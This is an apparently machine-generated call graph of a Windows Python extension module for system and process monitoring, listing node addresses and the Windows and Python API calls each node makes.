4382->4396 4383->4386 4384->4378 4384->4379 4385 7ffb9dd6692c 4389 7ffb9dd66931 GetProcessHeap HeapFree 4385->4389 4390 7ffb9dd66945 LeaveCriticalSection 4385->4390 4386->4385 4388 7ffb9dd66923 _Py_Dealloc 4386->4388 4388->4385 4389->4390 4390->4391 4392 7ffb9dd6689d CloseHandle 4392->4396 4393 7ffb9dd6687a GetProcessHeap HeapFree 4393->4392 4394 7ffb9dd66839 PyUnicode_FromWideChar 4394->4369 4395 7ffb9dd6684b PyList_Append 4394->4395 4395->4369 4395->4396 4396->4369 4396->4382 4396->4384 4396->4392 4396->4393 4396->4394 4397 7ffb9dd66865 _Py_Dealloc 4396->4397 4398 7ffb9dd663f0 CreateThread 4396->4398 4397->4396 4399 7ffb9dd66470 WaitForSingleObject 4398->4399 4400 7ffb9dd66439 GetLastError 4398->4400 4402 7ffb9dd66531 4399->4402 4403 7ffb9dd66489 4399->4403 4401 7ffb9dd61010 __stdio_common_vsprintf 4400->4401 4404 7ffb9dd66459 PyErr_SetFromWindowsErrWithFilename 4401->4404 4405 7ffb9dd6653a 4402->4405 4406 7ffb9dd665c5 GetExitCodeThread 4402->4406 4407 7ffb9dd66492 __acrt_iob_func 4403->4407 4408 7ffb9dd664f3 TerminateThread 4403->4408 4409 7ffb9dd66607 4404->4409 4410 7ffb9dd6659e TerminateThread 4405->4410 4411 7ffb9dd66543 __acrt_iob_func 4405->4411 4414 7ffb9dd6660e CloseHandle 4406->4414 4415 7ffb9dd665da TerminateThread 4406->4415 4412 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4407->4412 4413 7ffb9dd66521 CloseHandle 4408->4413 4420 7ffb9dd66502 4408->4420 4417 7ffb9dd6a0a0 8 API calls 4409->4417 4410->4420 4418 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4411->4418 4419 7ffb9dd664b9 __acrt_iob_func 4412->4419 4413->4409 4414->4409 4416 7ffb9dd665f2 CloseHandle 4415->4416 4415->4420 4422 7ffb9dd61070 11 API calls 4416->4422 4423 7ffb9dd66628 4417->4423 4424 7ffb9dd6656a __acrt_iob_func 4418->4424 4425 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4419->4425 4421 7ffb9dd61070 11 API calls 4420->4421 4426 7ffb9dd6650e CloseHandle 4421->4426 4422->4409 4423->4396 4427 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4424->4427 4428 7ffb9dd664d9 __acrt_iob_func 4425->4428 4426->4409 4429 7ffb9dd66584 __acrt_iob_func 4427->4429 4430 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4428->4430 4431 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4429->4431 4430->4408 4431->4410 4432 7ffb9dd65cf0 PyArg_ParseTuple 4433 7ffb9dd65d58 4432->4433 4434 7ffb9dd65d13 4432->4434 4435 7ffb9dd65d1b 4434->4435 4436 7ffb9dd65d29 OpenProcess 4434->4436 4437 7ffb9dd61180 12 API calls 4435->4437 4438 7ffb9dd65d41 GetLastError 4436->4438 4439 7ffb9dd65d65 4436->4439 4441 7ffb9dd65d27 4437->4441 4438->4439 4442 7ffb9dd65d4c 4438->4442 4440 7ffb9dd67a40 45 API calls 4439->4440 4440->4441 4441->4433 4444 7ffb9dd65d77 GetProcessHandleCount 4441->4444 4443 7ffb9dd61070 11 API calls 4442->4443 4443->4433 4445 7ffb9dd65da7 CloseHandle Py_BuildValue 4444->4445 4446 7ffb9dd65d89 PyErr_SetFromWindowsErr CloseHandle 4444->4446 4477 7ffb9dd6a774 4479 7ffb9dd6a798 __scrt_release_startup_lock 4477->4479 4478 7ffb9dd6ad8e _seh_filter_dll 4479->4478 3260 7ffb9dd618c0 PyModule_Create2 3261 7ffb9dd61a21 3260->3261 3262 7ffb9dd618fd getenv 3260->3262 3264 7ffb9dd6a0a0 8 API calls 3261->3264 3276 7ffb9dd613d0 PyEval_SaveThread LoadLibraryA PyEval_RestoreThread 3262->3276 3265 7ffb9dd61a33 3264->3265 3266 7ffb9dd61926 3266->3261 3267 7ffb9dd61940 RtlGetVersion 3266->3267 3268 7ffb9dd61954 GetSystemInfo InitializeCriticalSection 3267->3268 3331 7ffb9dd67e20 GetCurrentProcess OpenProcessToken 3268->3331 3272 7ffb9dd619dd PyModule_GetState PyErr_NewException 3273 7ffb9dd61a44 36 API calls 3272->3273 3274 7ffb9dd61a13 3272->3274 3273->3261 3274->3261 3275 7ffb9dd61a18 _Py_Dealloc 3274->3275 3275->3261 3277 7ffb9dd61412 GetProcAddress 3276->3277 3278 7ffb9dd61401 PyErr_SetFromWindowsErrWithFilename 3276->3278 3280 7ffb9dd61458 GetModuleHandleA 3277->3280 3281 7ffb9dd61427 PyErr_SetFromWindowsErrWithFilename FreeLibrary 3277->3281 3279 7ffb9dd6143f 3278->3279 3279->3266 3282 7ffb9dd61471 PyErr_SetFromWindowsErrWithFilename 3280->3282 3283 7ffb9dd6147a GetProcAddress 3280->3283 3281->3279 3282->3266 3283->3282 3285 7ffb9dd614b7 GetModuleHandleA 3283->3285 3286 7ffb9dd614d0 PyErr_SetFromWindowsErrWithFilename 3285->3286 3287 7ffb9dd614d9 GetProcAddress 3285->3287 3286->3266 3287->3286 3288 7ffb9dd61516 PyEval_SaveThread LoadLibraryA PyEval_RestoreThread 3287->3288 3290 7ffb9dd6156a GetProcAddress 3288->3290 3291 7ffb9dd61544 PyErr_SetFromWindowsErrWithFilename 3288->3291 3292 7ffb9dd615b0 3290->3292 3293 7ffb9dd6157f PyErr_SetFromWindowsErrWithFilename FreeLibrary 3290->3293 3291->3266 3367 7ffb9dd612c0 PyEval_SaveThread LoadLibraryA PyEval_RestoreThread 3292->3367 3293->3266 3296 7ffb9dd612c0 7 API calls 3297 7ffb9dd615ed 3296->3297 3297->3279 3298 7ffb9dd612c0 7 API calls 3297->3298 3299 7ffb9dd61610 3298->3299 3299->3279 3300 7ffb9dd612c0 7 API calls 3299->3300 3301 7ffb9dd61633 3300->3301 3301->3279 3302 7ffb9dd612c0 7 API calls 3301->3302 3303 7ffb9dd61656 3302->3303 3303->3279 3304 7ffb9dd612c0 7 API calls 3303->3304 3305 7ffb9dd61679 3304->3305 3305->3279 3306 7ffb9dd612c0 7 API calls 3305->3306 3307 7ffb9dd6169c 3306->3307 3307->3279 3308 7ffb9dd612c0 7 API calls 3307->3308 3309 7ffb9dd616bf 3308->3309 3309->3279 3310 7ffb9dd616cf GetModuleHandleA 3309->3310 3311 7ffb9dd616e1 PyErr_SetFromWindowsErrWithFilename 3310->3311 3312 7ffb9dd616ea GetProcAddress 3310->3312 3311->3266 3312->3311 3314 7ffb9dd61727 3312->3314 3315 7ffb9dd612c0 7 API calls 3314->3315 3316 7ffb9dd61741 3315->3316 3316->3279 3317 7ffb9dd61751 GetModuleHandleA 3316->3317 3318 7ffb9dd6176c GetProcAddress 3317->3318 3319 7ffb9dd61763 3317->3319 3321 7ffb9dd61792 3318->3321 3322 7ffb9dd61781 3318->3322 3320 7ffb9dd61788 PyErr_SetFromWindowsErrWithFilename 3319->3320 3320->3321 3323 7ffb9dd612c0 7 API calls 3321->3323 3322->3320 3324 7ffb9dd617ac 3323->3324 3325 7ffb9dd612c0 7 API calls 3324->3325 3326 7ffb9dd617c6 3325->3326 3327 7ffb9dd612c0 7 API calls 3326->3327 3328 7ffb9dd617e0 3327->3328 3329 7ffb9dd612c0 7 API calls 3328->3329 3330 7ffb9dd617fa PyErr_Clear 3329->3330 3330->3266 3332 7ffb9dd67f0d 3331->3332 3333 7ffb9dd67e79 GetLastError 3331->3333 3336 7ffb9dd67f21 LookupPrivilegeValueA 3332->3336 3337 7ffb9dd67f17 3332->3337 3334 7ffb9dd67ed6 GetLastError 3333->3334 3335 7ffb9dd67e86 ImpersonateSelf 3333->3335 3338 7ffb9dd61010 __stdio_common_vsprintf 3334->3338 3339 7ffb9dd67ea9 OpenProcessToken 3335->3339 3340 7ffb9dd67e93 3335->3340 3342 7ffb9dd67f41 GetLastError 3336->3342 3343 7ffb9dd67f73 AdjustTokenPrivileges 3336->3343 3341 7ffb9dd67d80 7 API calls 3337->3341 3344 7ffb9dd67ef6 PyErr_SetFromWindowsErrWithFilename 3338->3344 3339->3332 3347 7ffb9dd67ec0 3339->3347 3382 7ffb9dd61070 GetLastError 3340->3382 3346 7ffb9dd67ea4 3341->3346 3348 7ffb9dd61010 __stdio_common_vsprintf 3342->3348 3349 7ffb9dd67fb7 GetLastError 3343->3349 3350 7ffb9dd67fea AdjustTokenPrivileges 3343->3350 3353 7ffb9dd67d80 7 API calls 3344->3353 3361 7ffb9dd6a0a0 8 API calls 3346->3361 3355 7ffb9dd61070 11 API calls 3347->3355 3356 7ffb9dd67f61 PyErr_SetFromWindowsErrWithFilename 3348->3356 3357 7ffb9dd61010 __stdio_common_vsprintf 3349->3357 3351 7ffb9dd68024 3350->3351 3352 7ffb9dd68035 RevertToSelf CloseHandle 3350->3352 3359 7ffb9dd61070 11 API calls 3351->3359 3352->3346 3353->3346 3362 7ffb9dd67ecc 3355->3362 3363 7ffb9dd68030 3356->3363 3358 7ffb9dd67fd9 PyErr_SetFromWindowsErrWithFilename 3357->3358 3358->3363 3359->3363 3360 7ffb9dd67d80 7 API calls 3360->3346 3365 7ffb9dd619d9 3361->3365 3366 7ffb9dd67d80 7 API calls 3362->3366 3372 7ffb9dd67d80 3363->3372 3365->3261 3365->3272 3366->3346 3368 7ffb9dd612fd PyErr_SetFromWindowsErrWithFilename 3367->3368 3369 7ffb9dd6130a GetProcAddress 3367->3369 3370 7ffb9dd6132f 3368->3370 3369->3370 3371 7ffb9dd6131b PyErr_SetFromWindowsErrWithFilename FreeLibrary 3369->3371 3370->3279 3370->3296 3371->3370 3373 7ffb9dd67d8d __acrt_iob_func 3372->3373 3374 7ffb9dd67de8 GetLastError 3372->3374 3375 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3373->3375 3376 7ffb9dd67e10 PyErr_Clear 3374->3376 3377 7ffb9dd67df3 PyErr_WarnEx 3374->3377 3378 7ffb9dd67db4 __acrt_iob_func 3375->3378 3377->3376 3379 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3378->3379 3380 7ffb9dd67dce __acrt_iob_func 3379->3380 3381 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3380->3381 3381->3374 3383 7ffb9dd61010 __stdio_common_vsprintf 3382->3383 3384 7ffb9dd610ae PyErr_SetFromWindowsErrWithFilename 3383->3384 3385 7ffb9dd6a0a0 8 API calls 3384->3385 3386 7ffb9dd610cd 3385->3386 3386->3360 3387 7ffb9dd61dc0 GetSystemTimes 3388 7ffb9dd61dec Py_BuildValue 3387->3388 3389 7ffb9dd61ddd PyErr_SetFromWindowsErr 3387->3389 4504 7ffb9dd64d40 PyArg_ParseTuple 4505 7ffb9dd64dad 4504->4505 4506 7ffb9dd64d68 4504->4506 4507 7ffb9dd64d70 4506->4507 4508 7ffb9dd64d7e OpenProcess 4506->4508 4509 7ffb9dd61180 12 API calls 4507->4509 4510 7ffb9dd64dba 4508->4510 4511 7ffb9dd64d96 GetLastError 4508->4511 4512 7ffb9dd64d7c 4509->4512 4514 7ffb9dd67a40 45 API calls 4510->4514 4511->4510 4513 7ffb9dd64da1 4511->4513 4512->4505 4516 7ffb9dd64dcc PyObject_IsTrue 4512->4516 4515 7ffb9dd61070 11 API calls 4513->4515 4514->4512 4515->4505 4517 7ffb9dd64dde NtSuspendProcess 4516->4517 4518 7ffb9dd64de6 NtResumeProcess 4516->4518 4519 7ffb9dd64dec CloseHandle 4517->4519 4518->4519 4520 7ffb9dd64dfb 4519->4520 4521 7ffb9dd64e14 4519->4521 4522 7ffb9dd61350 11 API calls 4520->4522 4523 7ffb9dd64e09 4522->4523 4480 7ffb9dd65940 PyArg_ParseTuple 4481 7ffb9dd659ba 4480->4481 4482 7ffb9dd65975 4480->4482 4488 7ffb9dd6a0a0 8 API calls 4481->4488 4483 7ffb9dd6598b OpenProcess 4482->4483 4484 7ffb9dd6597d 4482->4484 4486 7ffb9dd659da 4483->4486 4487 7ffb9dd659a3 GetLastError 4483->4487 4485 7ffb9dd61180 12 API calls 4484->4485 4492 7ffb9dd65989 4485->4492 4491 7ffb9dd67a40 45 API calls 4486->4491 4487->4486 4489 7ffb9dd659ae 4487->4489 4490 7ffb9dd659c9 4488->4490 4493 7ffb9dd61070 11 API calls 4489->4493 4491->4492 4492->4481 4494 7ffb9dd659ec GetProcessIoCounters 4492->4494 4493->4481 4495 7ffb9dd65a11 CloseHandle Py_BuildValue 4494->4495 4496 7ffb9dd659fe PyErr_SetFromWindowsErr CloseHandle 4494->4496 4495->4481 4496->4481 4497 7ffb9dd65c40 PyArg_ParseTuple 4498 7ffb9dd65c61 4497->4498 4499 7ffb9dd65ce7 4497->4499 4500 7ffb9dd67480 21 API calls 4498->4500 4501 7ffb9dd65c74 4500->4501 4501->4499 4502 7ffb9dd65ca5 free 4501->4502 4503 7ffb9dd65cc6 free 4501->4503 4524 7ffb9dd64940 PyArg_ParseTuple 4525 7ffb9dd649bd 4524->4525 4526 7ffb9dd64978 4524->4526 4532 7ffb9dd6a0a0 8 API calls 4525->4532 4527 7ffb9dd64980 4526->4527 4528 7ffb9dd6498e OpenProcess 4526->4528 4529 7ffb9dd61180 12 API calls 4527->4529 4530 7ffb9dd649e0 4528->4530 4531 7ffb9dd649a6 GetLastError 4528->4531 4536 7ffb9dd6498c 4529->4536 4535 7ffb9dd67a40 45 API calls 4530->4535 4531->4530 4533 7ffb9dd649b1 4531->4533 4534 7ffb9dd649cf 4532->4534 4537 7ffb9dd61070 11 API calls 4533->4537 4535->4536 4536->4525 4538 7ffb9dd649f2 GetProcessMemoryInfo 4536->4538 4537->4525 4539 7ffb9dd64a1d CloseHandle Py_BuildValue 4538->4539 4540 7ffb9dd64a0a PyErr_SetFromWindowsErr CloseHandle 4538->4540 4539->4525 4540->4525 4541 7ffb9dd62240 4542 7ffb9dd6226c 4541->4542 4549 7ffb9dd622b2 4541->4549 4543 7ffb9dd6244e 4542->4543 4544 7ffb9dd62278 __acrt_iob_func 4542->4544 4545 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4544->4545 4546 7ffb9dd6229d __acrt_iob_func 4545->4546 4551 7ffb9dd6242c 4546->4551 4547 7ffb9dd622c4 GetLastError 4548 7ffb9dd6236c 4547->4548 4547->4549 4558 7ffb9dd623da 4548->4558 4559 7ffb9dd62374 __acrt_iob_func 4548->4559 4549->4547 4552 7ffb9dd622e1 malloc 4549->4552 4553 7ffb9dd622d8 free 4549->4553 4554 7ffb9dd6230a 4549->4554 4550 7ffb9dd6233a free 4555 7ffb9dd6234b Py_BuildValue 4550->4555 4556 7ffb9dd623ea 4550->4556 4557 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4551->4557 4561 7ffb9dd6235f PyErr_NoMemory 4552->4561 4562 7ffb9dd622f3 GetLogicalProcessorInformationEx 4552->4562 4553->4552 4554->4550 4554->4554 4555->4543 4556->4543 4563 7ffb9dd623f3 __acrt_iob_func 4556->4563 4564 7ffb9dd62434 __acrt_iob_func 4557->4564 4558->4543 4560 7ffb9dd623df free 4558->4560 4565 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4559->4565 4560->4543 4561->4543 4562->4547 4562->4554 4566 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4563->4566 4567 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4564->4567 4568 7ffb9dd6239b GetLastError __acrt_iob_func 4565->4568 4569 7ffb9dd6241a __acrt_iob_func 4566->4569 4567->4543 4570 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4568->4570 4569->4551 4571 7ffb9dd623c0 __acrt_iob_func 4570->4571 4572 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4571->4572 4572->4558 4573 7ffb9dd646c0 PyArg_ParseTuple 4574 7ffb9dd646f1 4573->4574 4575 7ffb9dd64926 4573->4575 4576 7ffb9dd646f9 4574->4576 4577 7ffb9dd64715 4574->4577 4578 7ffb9dd61180 12 API calls 4576->4578 4579 7ffb9dd67d20 49 API calls 4577->4579 4580 7ffb9dd64705 4578->4580 4581 7ffb9dd6471a 4579->4581 4582 7ffb9dd6471e 4581->4582 4583 7ffb9dd6473a GetProcessHeap HeapAlloc 4581->4583 4586 7ffb9dd610e0 12 API calls 4582->4586 4584 7ffb9dd64920 PyErr_NoMemory 4583->4584 4585 7ffb9dd6475d NtQuerySystemInformation 4583->4585 4584->4575 4587 7ffb9dd64796 4585->4587 4588 7ffb9dd64865 4585->4588 4589 7ffb9dd6472a 4586->4589 4590 7ffb9dd6480c GetProcessHeap HeapFree GetProcessHeap HeapAlloc 4587->4590 4591 7ffb9dd6479d 4587->4591 4592 7ffb9dd648c8 4588->4592 4593 7ffb9dd64869 GetProcessHeap HeapFree 4588->4593 4590->4584 4597 7ffb9dd64848 NtQuerySystemInformation 4590->4597 4594 7ffb9dd647a0 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 4591->4594 4605 7ffb9dd6480a 4591->4605 4595 7ffb9dd648d2 Py_BuildValue 4592->4595 4596 7ffb9dd648e8 PyUnicode_FromWideChar 4592->4596 4598 7ffb9dd67d20 49 API calls 4593->4598 4594->4584 4599 7ffb9dd647d9 NtQuerySystemInformation 4594->4599 4600 7ffb9dd648f6 GetProcessHeap HeapFree 4595->4600 4596->4600 4597->4588 4601 7ffb9dd64886 4598->4601 4599->4588 4599->4591 4602 7ffb9dd648a8 4601->4602 4603 7ffb9dd6488a 4601->4603 4604 7ffb9dd61350 11 API calls 4602->4604 4606 7ffb9dd610e0 12 API calls 4603->4606 4607 7ffb9dd648b6 4604->4607 4605->4593 4608 7ffb9dd64896 4606->4608 4609 7ffb9dd63dc0 PyDict_New 4610 7ffb9dd63dfa 4609->4610 4629 7ffb9dd64073 4609->4629 4611 7ffb9dd63670 8 API calls 4610->4611 4613 7ffb9dd63e2f 4611->4613 4612 7ffb9dd6a0a0 8 API calls 4614 7ffb9dd640b5 4612->4614 4615 7ffb9dd64042 4613->4615 4616 7ffb9dd63e3b malloc 4613->4616 4621 7ffb9dd6404e _Py_Dealloc 4615->4621 4622 7ffb9dd64057 4615->4622 4617 7ffb9dd63e4e PyErr_NoMemory 4616->4617 4618 7ffb9dd63e59 GetIfTable 4616->4618 4617->4615 4619 7ffb9dd63e9d GetIfTable 4618->4619 4620 7ffb9dd63e77 free malloc 4618->4620 4624 7ffb9dd63eb2 PyErr_SetString 4619->4624 4641 7ffb9dd63ece 4619->4641 4620->4619 4623 7ffb9dd63e92 PyErr_NoMemory 4620->4623 4621->4622 4625 7ffb9dd6405c free 4622->4625 4626 7ffb9dd64065 4622->4626 4623->4615 4624->4615 4625->4626 4628 7ffb9dd6406a free 4626->4628 4626->4629 4627 7ffb9dd63fed free free 4627->4629 4628->4629 4629->4612 4630 7ffb9dd629d0 swprintf_s __stdio_common_vsprintf_s 4631 7ffb9dd63f0a lstrcmpA 4630->4631 4631->4641 4632 7ffb9dd63f40 PyUnicode_FromWideChar 4633 7ffb9dd64004 4632->4633 4632->4641 4634 7ffb9dd64018 4633->4634 4635 7ffb9dd6400f _Py_Dealloc 4633->4635 4636 7ffb9dd6402c 4634->4636 4638 7ffb9dd64023 _Py_Dealloc 4634->4638 4635->4634 4636->4615 4640 7ffb9dd64037 _Py_Dealloc 4636->4640 4637 7ffb9dd63f72 Py_BuildValue 4637->4633 4639 7ffb9dd63fa8 PyDict_SetItem 4637->4639 4638->4636 4639->4633 4639->4641 4640->4615 4641->4627 4641->4630 4641->4632 4641->4637 4642 7ffb9dd63fc1 _Py_Dealloc 4641->4642 4643 7ffb9dd63fd0 _Py_Dealloc 4641->4643 4642->4641 4643->4641 4665 7ffb9dd69a40 PyList_New 4666 7ffb9dd69d65 4665->4666 4669 7ffb9dd69a87 4665->4669 4667 7ffb9dd6a0a0 8 API calls 4666->4667 4668 7ffb9dd69dcc 4667->4668 4669->4666 4670 7ffb9dd69afc GetLastError 4669->4670 4681 7ffb9dd69b17 4669->4681 4670->4666 4671 7ffb9dd69b0b 4670->4671 4672 7ffb9dd61070 11 API calls 4671->4672 4673 7ffb9dd69e2c 4672->4673 4673->4666 4674 7ffb9dd69e32 _Py_Dealloc 4673->4674 4674->4666 4675 7ffb9dd629d0 swprintf_s __stdio_common_vsprintf_s 4676 7ffb9dd69c22 Py_BuildValue 4675->4676 4676->4673 4676->4681 4677 7ffb9dd69dfe 4678 7ffb9dd61070 11 API calls 4677->4678 4680 7ffb9dd69e0a 4678->4680 4679 7ffb9dd69c9a PyUnicode_FromWideChar 4679->4680 4679->4681 4680->4673 4682 7ffb9dd69e15 _Py_Dealloc 4680->4682 4681->4666 4681->4671 4681->4675 4681->4677 4681->4679 4683 7ffb9dd69cea Py_BuildValue 4681->4683 4688 7ffb9dd69d2c _Py_Dealloc 4681->4688 4690 7ffb9dd69d40 _Py_Dealloc 4681->4690 4691 7ffb9dd69d4f _Py_Dealloc 4681->4691 4682->4673 4684 7ffb9dd69d12 PyList_Append 4683->4684 4685 7ffb9dd69dd9 4683->4685 4684->4681 4684->4685 4686 7ffb9dd69ddf _Py_Dealloc 4685->4686 4687 7ffb9dd69de8 4685->4687 4686->4687 4687->4680 4689 7ffb9dd69df3 _Py_Dealloc 4687->4689 4688->4681 4689->4680 4690->4681 4691->4681 3253 7ffb9dd63450 K32GetPerformanceInfo 3254 7ffb9dd6349f Py_BuildValue 3253->3254 3255 7ffb9dd6347d PyErr_SetFromWindowsErr 3253->3255 3256 7ffb9dd6a0a0 8 API calls 3254->3256 3257 7ffb9dd6a0a0 8 API calls 3255->3257 3258 7ffb9dd634f3 3256->3258 3259 7ffb9dd63497 3257->3259 4697 7ffb9dd65850 PyArg_ParseTuple 4698 7ffb9dd658bd 4697->4698 4699 7ffb9dd65878 4697->4699 4700 7ffb9dd65880 4699->4700 4701 7ffb9dd6588e OpenProcess 4699->4701 4702 7ffb9dd61180 12 API calls 4700->4702 4703 7ffb9dd658ca 4701->4703 4704 7ffb9dd658a6 GetLastError 4701->4704 4707 7ffb9dd6588c 4702->4707 4706 7ffb9dd67a40 45 API calls 4703->4706 4704->4703 4705 7ffb9dd658b1 4704->4705 4708 7ffb9dd61070 11 API calls 4705->4708 4706->4707 4707->4698 4709 7ffb9dd658dc NtSetInformationProcess CloseHandle 4707->4709 4708->4698 4710 7ffb9dd6591c 4709->4710 4711 7ffb9dd65903 4709->4711 4712 7ffb9dd61350 11 API calls 4711->4712 4713 7ffb9dd65911 4712->4713 4714 7ffb9dd62850 4715 7ffb9dd62862 4714->4715 4716 7ffb9dd62883 4714->4716 4721 7ffb9dd62914 LocalAlloc 4715->4721 4726 7ffb9dd62873 PyErr_SetFromWindowsErr 4715->4726 4717 7ffb9dd6288c __acrt_iob_func 4716->4717 4718 7ffb9dd628e7 4716->4718 4719 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4717->4719 4720 7ffb9dd628f1 PyErr_SetString 4718->4720 4718->4721 4722 7ffb9dd628b3 __acrt_iob_func 4719->4722 4720->4721 4723 7ffb9dd6290c 4720->4723 4724 7ffb9dd62949 CallNtPowerInformation 4721->4724 4725 7ffb9dd62934 PyErr_SetFromWindowsErr 4721->4725 4727 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4722->4727 4728 7ffb9dd6298f LocalFree Py_BuildValue 4724->4728 4729 7ffb9dd62962 PyErr_SetString LocalFree 4724->4729 4730 7ffb9dd628cd __acrt_iob_func 4727->4730 4731 7ffb9dd61d70 fprintf __stdio_common_vfprintf 4730->4731 4731->4718 4732 7ffb9dd63750 PyDict_New 4733 7ffb9dd63770 4732->4733 4734 7ffb9dd63768 4732->4734 4735 7ffb9dd63670 8 API calls 4733->4735 4736 7ffb9dd6378c 4735->4736 4737 7ffb9dd63918 4736->4737 4738 7ffb9dd637a0 malloc 4736->4738 4739 7ffb9dd6391e _Py_Dealloc 4737->4739 4740 7ffb9dd63927 4737->4740 4741 7ffb9dd63912 PyErr_NoMemory 4738->4741 4742 7ffb9dd637b7 GetIfEntry2 4738->4742 4739->4740 4743 7ffb9dd6392c free 4740->4743 4744 7ffb9dd63935 4740->4744 4741->4737 4745 7ffb9dd637da Py_BuildValue 4742->4745 4746 7ffb9dd638f9 PyErr_SetString 4742->4746 4743->4744 4747 7ffb9dd6393a free 4744->4747 4748 7ffb9dd63943 4744->4748 4745->4737 4749 7ffb9dd63852 PyUnicode_FromWideChar 4745->4749 4746->4737 4747->4748 4751 7ffb9dd638e8 4749->4751 4752 7ffb9dd63878 PyDict_SetItem 4749->4752 4751->4737 4753 7ffb9dd638ee _Py_Dealloc 4751->4753 4754 7ffb9dd6388e 4752->4754 4755 7ffb9dd638d3 4752->4755 4753->4737 4757 7ffb9dd63897 _Py_Dealloc 4754->4757 4758 7ffb9dd638af free 4754->4758 4759 7ffb9dd638a6 _Py_Dealloc 4754->4759 4755->4751 4756 7ffb9dd638df _Py_Dealloc 4755->4756 4756->4751 4757->4754 4758->4738 4760 7ffb9dd638c5 free 4758->4760 4759->4758 4760->4748 4761 7ffb9dd65b50 PyArg_ParseTuple 4762 7ffb9dd65bbd 4761->4762 4763 7ffb9dd65b78 4761->4763 4764 7ffb9dd65b80 4763->4764 4765 7ffb9dd65b8e OpenProcess 4763->4765 4766 7ffb9dd61180 12 API calls 4764->4766 4767 7ffb9dd65bca 4765->4767 4768 7ffb9dd65ba6 GetLastError 4765->4768 4771 7ffb9dd65b8c 4766->4771 4770 7ffb9dd67a40 45 API calls 4767->4770 4768->4767 4769 7ffb9dd65bb1 4768->4769 4772 7ffb9dd61070 11 API calls 4769->4772 4770->4771 4771->4762 4773 7ffb9dd65bdc SetProcessAffinityMask 4771->4773 4772->4762 4774 7ffb9dd65c0c CloseHandle 4773->4774 4775 7ffb9dd65bee PyErr_SetFromWindowsErr CloseHandle 4773->4775 4776 7ffb9dd640d0 PyArg_ParseTuple 4777 7ffb9dd6415f 4776->4777 4778 7ffb9dd640ef 4776->4778 4779 7ffb9dd640f7 OpenProcess 4778->4779 4780 7ffb9dd64124 PyBool_FromLong 4778->4780 4781 7ffb9dd6413f PyErr_Clear 4779->4781 4782 7ffb9dd6410c 4779->4782 4783 7ffb9dd678f0 12 API calls 4781->4783 4784 7ffb9dd67a40 45 API calls 4782->4784 4785 7ffb9dd6414c 4783->4785 4786 7ffb9dd64116 4784->4786 4785->4777 4787 7ffb9dd64151 PyBool_FromLong 4785->4787 4788 7ffb9dd6411b CloseHandle 4786->4788 4789 7ffb9dd64137 CloseHandle 4786->4789 4788->4780 4789->4781 4790 7ffb9dd65dd0 PyList_New 4791 7ffb9dd65e0a PyArg_ParseTuple 4790->4791 4800 7ffb9dd6601f 4790->4800 4792 7ffb9dd65e3f 4791->4792 4793 7ffb9dd66002 4791->4793 4795 7ffb9dd67ca0 13 API calls 4792->4795 4796 7ffb9dd66011 4793->4796 4797 7ffb9dd66008 _Py_Dealloc 4793->4797 4794 7ffb9dd6a0a0 8 API calls 4798 7ffb9dd66049 4794->4798 4799 7ffb9dd65e4d 4795->4799 4796->4800 4801 7ffb9dd66016 CloseHandle 4796->4801 4797->4796 4799->4793 4802 7ffb9dd65e59 VirtualQueryEx 4799->4802 4800->4794 4801->4800 4803 7ffb9dd65fd0 CloseHandle 4802->4803 4811 7ffb9dd65e7f 4802->4811 4803->4800 4804 7ffb9dd65e8f GetMappedFileNameW 4805 7ffb9dd65fab VirtualQueryEx 4804->4805 4804->4811 4805->4803 4805->4811 4806 7ffb9dd65eca PyUnicode_FromWideChar 4806->4793 4806->4811 4807 7ffb9dd65f52 Py_BuildValue 4808 7ffb9dd65f77 PyList_Append 4807->4808 4809 7ffb9dd65ff3 4807->4809 4810 7ffb9dd65fde 4808->4810 4808->4811 4809->4793 4812 7ffb9dd65ff9 _Py_Dealloc 4809->4812 4810->4809 4814 7ffb9dd65fea _Py_Dealloc 4810->4814 4811->4803 4811->4804 4811->4805 4811->4806 4811->4807 4813 7ffb9dd65f93 _Py_Dealloc 4811->4813 4815 7ffb9dd65fa2 _Py_Dealloc 4811->4815 4812->4793 4813->4811 4814->4809 4815->4805 4817 7ffb9dd68750 PyArg_ParseTuple 4818 7ffb9dd6877c 4817->4818 4819 7ffb9dd68775 4817->4819 4820 7ffb9dd680f0 17 API calls 4818->4820 4821 7ffb9dd6879d 4820->4821 4822 7ffb9dd6881e 4821->4822 4823 7ffb9dd687a5 QueryServiceStatusEx GetLastError 4821->4823 4824 7ffb9dd687cd CloseServiceHandle Py_BuildValue 4823->4824 4825 7ffb9dd687fe GetLastError 4823->4825 4826 7ffb9dd68809 4825->4826 4827 7ffb9dd68834 GetProcessHeap HeapAlloc 4825->4827 4828 7ffb9dd61070 11 API calls 4826->4828 4829 7ffb9dd6885c QueryServiceStatusEx 4827->4829 4830 7ffb9dd68854 PyErr_NoMemory 4827->4830 4831 7ffb9dd68815 CloseServiceHandle 4828->4831 4832 7ffb9dd6887d 4829->4832 4833 7ffb9dd6888b Py_BuildValue 4829->4833 4830->4831 4831->4822 4834 7ffb9dd61070 11 API calls 4832->4834 4837 7ffb9dd68907 CloseServiceHandle GetProcessHeap HeapFree 4833->4837 4838 7ffb9dd68929 CloseServiceHandle GetProcessHeap HeapFree 4833->4838 4835 7ffb9dd68889 4834->4835 4835->4837 4837->4822 4839 7ffb9dd684d0 PyArg_ParseTuple 4840 7ffb9dd68501 4839->4840 4841 7ffb9dd684f7 4839->4841 4842 7ffb9dd680f0 17 API calls 4840->4842 4843 7ffb9dd6852d 4842->4843 4844 7ffb9dd6871f 4843->4844 4845 7ffb9dd68539 QueryServiceConfigW GetLastError 4843->4845 4846 7ffb9dd6855c 4845->4846 4847 7ffb9dd68576 malloc 